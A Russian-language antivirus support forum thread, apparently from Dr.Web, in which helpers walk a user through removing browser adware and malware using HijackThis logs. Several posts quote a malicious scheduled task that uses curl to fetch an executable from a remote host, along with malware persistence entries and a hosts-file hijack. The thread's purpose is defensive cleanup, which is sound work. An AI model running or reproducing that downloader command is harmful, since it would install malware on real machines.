95 ответов в этой теме

[Dmitry Shutov]

 

 

 

O4 - HKCU\..\RunOnce: [pggmbosqhf] "C:\Users\Айдар\AppData\Local\Temp\cZuL4FvvR84g.exe"

O4 - HKCU\..\RunOnce: [skhgpuvakn] "C:\Users\Айдар\AppData\Local\Temp\HLbX584p7lp8.exe"

 

https://virustotalcloud.appspot.com/nui/index.html#/file/5d5da4f616e21f1dca3c502a20a94d2fc2142b40e7cb5d9926f17e4e12ca525c/detection

 

O4 - HKCU\..\Run: [ycAutoLaunch_7C9DB80CB81D08542AA9F9978FB56464] "C:\Users\Айдар\AppData\Local\yc\Application\yc.exe" /prefetch:5

 

https://virustotalcloud.appspot.com/nui/index.html#/file/b8b43010065bc1ad58a003e09d59327879e416af402d084db3fcdc0a360d9917/detection

 

 

cZuL4FvvR84g.exe и yc.exe в Вирусную лабораторию отправьте https://vms.drweb.ru/sendvirus/?lng=ru

 

Что делать с первыми двумя ссылками?
Отправил в лабораторию yc.exe.
Первый файл удалил - может отправить другой из той же папки с названием из наборов символов?

 

 

 

Вы сказали что по fixили...что я Вас просил, сделайте повторный лог hijackthis и выложите.

 

Ссылки говорят о там что эти файлы плохие (вирусы)

Сообщение было изменено Dmitry Shutov: 24 Август 2017 - 19:30

[Kaztur]

 

Пофиксить то пофиксил частично, но

1. yc.exe в отчёте всё равно есть, хотя я и файл, и всю его папку удалил отдельно

2. в хроме всё равно встраиваются скрипты рекламы (расширения все лишние удалил).

 

 

Прикрепленные файлы:

•  hijackthis4.log   11,13К   3 Скачано раз

[Dmitry Shutov]

uuxHwpnMkRCRpJh.job - удалите вот этот job

 

C : \ P r o g r a m   F i l e s   ( x 8 6 ) \ t h z X u J v j U \ x D 9 A h T l . d l l  - вот это dll есть по этому пути?

[Kaztur]

uuxHwpnMkRCRpJh.job - удалите вот этот job

 

C : \ P r o g r a m   F i l e s   ( x 8 6 ) \ t h z X u J v j U \ x D 9 A h T l . d l l  - вот это dll есть по этому пути?

А где найти этот job?

Файл такой есть по указанному пути, да.

[Dmitry Shutov]

И еще вот....это в лабораторию.

 

program files (x86)\qyerbvxrhie\kxyn4nadp.dll

[Kaztur]

И еще вот....это в лабораторию.

 

program files (x86)\qyerbvxrhie\kxyn4nadp.dll

Там 4 папки с названиями из наборов символов.(

Сообщение было изменено Kaztur: 24 Август 2017 - 19:53

[Dmitry Shutov]

 

uuxHwpnMkRCRpJh.job - удалите вот этот job

 

C : \ P r o g r a m   F i l e s   ( x 8 6 ) \ t h z X u J v j U \ x D 9 A h T l . d l l  - вот это dll есть по этому пути?

А где найти этот job?

Файл такой есть по указанному пути, да.

 

 

c:\Windows\Tasks\uuxHwpnMkRCRpJh.job  - должен быть тут

 

Эти файлы в вирлаб

 

C : \ P r o g r a m   F i l e s   ( x 8 6 ) \ t h z X u J v j U \ x D 9 A h T l . d l l 

C : \Program files (x86)\qyerbvxrhie\kxyn4nadp.dll

[Dmitry Shutov]

 

И еще вот....это в лабораторию.

 

program files (x86)\qyerbvxrhie\kxyn4nadp.dll

Там 4 папки с названиями из наборов символов.(

 

 

Вышлите что я просил...а потом удалите эти 4 папки

[Kaztur]

 

 

И еще вот....это в лабораторию.

 

program files (x86)\qyerbvxrhie\kxyn4nadp.dll

Там 4 папки с названиями из наборов символов.(

 

 

Вышлите что я просил...а потом удалите эти 4 папки

 

Отправил в лабораторию. Пошёл удалять...

[Dmitry Shutov]

 

 

 

И еще вот....это в лабораторию.

 

program files (x86)\qyerbvxrhie\kxyn4nadp.dll

Там 4 папки с названиями из наборов символов.(

 

 

Вышлите что я просил...а потом удалите эти 4 папки

 

Отправил в лабораторию. Пошёл удалять...

 

 

 

Это тоже fix

 

 

O1 - Hosts: 178.208.83.34 howcarworks.ru

O2 - BHO: YoutubeAdBlock - {C0D38E5A-7CF8-4105-8FE8-31B81443A114} - C:\Program Files (x86)\QYERbvxRHIE\kXyN4nadp.dll

O4 - HKCU\..\Run: [ycAutoLaunch_7C9DB80CB81D08542AA9F9978FB56464] "C:\Users\Айдар\AppData\Local\yc\Application\yc.exe" /prefetch:5

[Konstantin Yudin]

<Exec>
<Command>C:\Users\CA74~1\AppData\Roaming\curl\curl_7_54.exe</Command>
<Arguments>-f -L hxxp://amtomil.ru/f.exe-o C:\Users\CA74~1\AppData\Roaming\curl\curl.exe</Arguments>
</Exec>


тоже какая то фигня. жаль файл уже не отдает. хайджек ничего не знает про новые виста+ таски в итоге кучу тасков не пофиксить им. нужен farbar например.

с:\WINDOWS\system32\GroupPolicy - тут тоже все по удаляйте внутри.
C:\Users\CA74~1\AppData\Roaming\curl\curl.exe - тут есть этот файл?

Сообщение было изменено Konstantin Yudin: 24 Август 2017 - 20:04

[Kaztur]

 

 

 

 

И еще вот....это в лабораторию.

 

program files (x86)\qyerbvxrhie\kxyn4nadp.dll

Там 4 папки с названиями из наборов символов.(

 

 

Вышлите что я просил...а потом удалите эти 4 папки

 

Отправил в лабораторию. Пошёл удалять...

 

 

 

Это тоже fix

 

 

O1 - Hosts: 178.208.83.34 howcarworks.ru

O2 - BHO: YoutubeAdBlock - {C0D38E5A-7CF8-4105-8FE8-31B81443A114} - C:\Program Files (x86)\QYERbvxRHIE\kXyN4nadp.dll

O4 - HKCU\..\Run: [ycAutoLaunch_7C9DB80CB81D08542AA9F9978FB56464] "C:\Users\Айдар\AppData\Local\yc\Application\yc.exe" /prefetch:5

 

Первые два пофиксил (dll файл ещё на этапе удалению всего по предыдущему посту)
​А последний yc.exe нет в этой папке - я час назад удалил сначала файл, потом и папку, в которой он был - папки нет в пути.

Прикрепленные файлы:

•  2017-08-24_200833.jpg   148,72К   0 Скачано раз

[Kaztur]

<Exec>
<Command>C:\Users\CA74~1\AppData\Roaming\curl\curl_7_54.exe</Command>
<Arguments>-f -L hxxp://amtomil.ru/f.exe-o C:\Users\CA74~1\AppData\Roaming\curl\curl.exe</Arguments>
</Exec>


тоже какая то фигня. жаль файл уже не отдает. хайджек ничего не знает про новые виста+ таски в итоге кучу тасков не пофиксить им. нужен farbar например.

с:\WINDOWS\system32\GroupPolicy - тут тоже все по удаляйте внутри.
C:\Users\CA74~1\AppData\Roaming\curl\curl.exe - тут есть этот файл?

Удалил всё внутреннее содержимое папки по первому пункту, верно?
​curl.exe файла нет такого, есть curl_7_54.exe

[Dmitry Shutov]

 

<Exec>
<Command>C:\Users\CA74~1\AppData\Roaming\curl\curl_7_54.exe</Command>
<Arguments>-f -L hxxp://amtomil.ru/f.exe-o C:\Users\CA74~1\AppData\Roaming\curl\curl.exe</Arguments>
</Exec>


тоже какая то фигня. жаль файл уже не отдает. хайджек ничего не знает про новые виста+ таски в итоге кучу тасков не пофиксить им. нужен farbar например.

с:\WINDOWS\system32\GroupPolicy - тут тоже все по удаляйте внутри.
C:\Users\CA74~1\AppData\Roaming\curl\curl.exe - тут есть этот файл?

Удалил всё внутреннее содержимое папки по первому пункту, верно?
​curl.exe файла нет такого, есть curl_7_54.exe

 

Да верно, этот curl_7_54.exe тоже в лабораторию.

 

Все тикеты вида drweb.com #7782173 ....что вы выслали и вам пришли на почту укажите тут на форуме.

Сообщение было изменено Dmitry Shutov: 24 Август 2017 - 20:21

[Kaztur]

 

 

<Exec>
<Command>C:\Users\CA74~1\AppData\Roaming\curl\curl_7_54.exe</Command>
<Arguments>-f -L hxxp://amtomil.ru/f.exe-o C:\Users\CA74~1\AppData\Roaming\curl\curl.exe</Arguments>
</Exec>


тоже какая то фигня. жаль файл уже не отдает. хайджек ничего не знает про новые виста+ таски в итоге кучу тасков не пофиксить им. нужен farbar например.

с:\WINDOWS\system32\GroupPolicy - тут тоже все по удаляйте внутри.
C:\Users\CA74~1\AppData\Roaming\curl\curl.exe - тут есть этот файл?

Удалил всё внутреннее содержимое папки по первому пункту, верно?
​curl.exe файла нет такого, есть curl_7_54.exe

 

Да верно, этот curl_7_54.exe тоже в лабораторию.

 

Все тикеты вида drweb.com #7782173 ....что вы выслали и вам пришли на почту укажите тут на форуме.

 

Отправил в лабораторию.
​Предыдущие файлы отправлял без указания почты - не знал, что нужно будет дублировать здесь. Но первое сообщение по тикету (другой номер только - #7797279) просто с уведомлением о том, что файл отправлен на обработку.

[Konstantin Yudin]

curl_7_54.exe я думаю легален, раз им качают

[Kaztur]

Ещё такой момент - увидел в диспетчере задач задачу под названием "поиск" и иконкой поиска (см. вложение) - вроде никогда её (задачи) раньше не было.

В расположении файла задачи открывается папка с названием, в котором фигурирует "Cortana", но в конце папки тоже приписка с непонятным набором символов. Соседние папки тоже имеют эту же приписку.

Прикрепленные файлы:

•  2017-08-24_204000.jpg   185,09К   0 Скачано раз
•  2017-08-24_204008.jpg   30,88К   0 Скачано раз
•  2017-08-24_204156.jpg   101,53К   0 Скачано раз

[RomaNNN]

Kaztur, это вроде легальное.

[Dmitry Shutov]

Ещё такой момент - увидел в диспетчере задач задачу под названием "поиск" и иконкой поиска (см. вложение) - вроде никогда её (задачи) раньше не было.

В расположении файла задачи открывается папка с названием, в котором фигурирует "Cortana", но в конце папки тоже приписка с непонятным набором символов. Соседние папки тоже имеют эту же приписку.

 

 

Это норма.

 

http://bfy.tw/11ba

 

Что с проблемой? ...

[Kaztur]

 

Ещё такой момент - увидел в диспетчере задач задачу под названием "поиск" и иконкой поиска (см. вложение) - вроде никогда её (задачи) раньше не было.

В расположении файла задачи открывается папка с названием, в котором фигурирует "Cortana", но в конце папки тоже приписка с непонятным набором символов. Соседние папки тоже имеют эту же приписку.

 

 

Это норма.

 

http://bfy.tw/11ba

 

Что с проблемой? ...

 

Я знаю, что есть Кортана - просто смутил набор символов в части названия папок.

​Как определить, что с проблемой - наблюдалась она только в хроме. Мне после всех удалений, проверок антивирусом и прочего что лучше сделать: преустановить хром (можно ли оставить пользовательские данные при этом, пароли очень накладно все терять из автозаполнений?), ребутнуться, ребутнуться в безопасном и просканировать Кюрейтом ещё раз или ещё что-то?